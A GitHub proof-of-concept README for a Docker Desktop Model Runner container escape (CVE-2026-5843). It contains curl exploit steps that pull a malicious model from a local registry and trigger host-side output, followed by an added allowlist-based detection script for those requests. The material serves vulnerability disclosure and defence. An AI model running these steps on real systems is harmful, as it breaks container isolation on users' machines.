davidrxchester/CVE-2026-5843

GitHub: davidrxchester/CVE-2026-5843


# CVE-2026-5843 PoC

**Requires:** Docker Desktop ≤ 4.70.x (Apple Silicon) with Model Runner enabled

## Usage

```bash
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'
```

Output is written to `~/Desktop/mlx.txt` on the host.

Full writeup: https://davidrochester.com/posts/container-escape-via-inference

## Related CVEs

- [CVE-2026-5817](https://github.com/gouldnicholas/CVE-2026-5817-PoC) — vllm-metal `trust_remote_code=True`, same attack surface, patched in Docker Desktop 4.68.0
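A defender-side check for the two requests shown under Usage, added here as an example and not part of the PoC repository: it flags Model Runner pull and MLX chat-completion requests whose model reference names a registry outside an allowlist. The record format, the allowlist and the function names are assumptions; it presumes request logs captured by a proxy in front of Model Runner.

```python
import json

# Assumption: registries this environment trusts for model pulls.
ALLOWED_REGISTRIES = {"docker.io", "hf.co"}
# The two Model Runner paths used in the README's requests.
WATCHED_PATHS = {"/api/pull", "/engines/mlx/v1/chat/completions"}

def registry_of(ref):
    """Registry host[:port] of a model reference, per Docker's reference rule:
    the first component names a registry only if it contains '.' or ':'
    or is 'localhost'. Assumption: unqualified names resolve to Docker Hub."""
    first, sep, _ = ref.partition("/")
    if sep and ("." in first or ":" in first or first == "localhost"):
        return first.lower()
    return "docker.io"

def flag_requests(records):
    """Return (src, path, ref, registry) for requests naming an untrusted registry."""
    hits = []
    for rec in records:
        if rec.get("path") not in WATCHED_PATHS:
            continue
        try:
            body = json.loads(rec.get("body") or "")
        except (ValueError, TypeError):
            continue  # unparseable body: nothing to inspect
        if not isinstance(body, dict):
            continue
        ref = body.get("name") or body.get("model")  # pull uses "name", chat uses "model"
        if not isinstance(ref, str):
            continue
        registry = registry_of(ref)
        if registry not in ALLOWED_REGISTRIES:
            hits.append((rec.get("src"), rec["path"], ref, registry))
    return hits

# Constructed sample records (hypothetical proxy log format, not real traffic).
SAMPLE = [
    {"src": "172.17.0.2", "path": "/api/pull",
     "body": '{"name":"localhost:5555/evil/model:latest"}'},
    {"src": "172.17.0.2", "path": "/engines/mlx/v1/chat/completions",
     "body": '{"model":"localhost:5555/evil/model:latest","messages":[]}'},
    {"src": "172.17.0.3", "path": "/api/pull", "body": '{"name":"ai/smollm2:latest"}'},
    {"src": "172.17.0.3", "path": "/api/pull", "body": "not json"},
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE):
        print("ALERT", *hit)
```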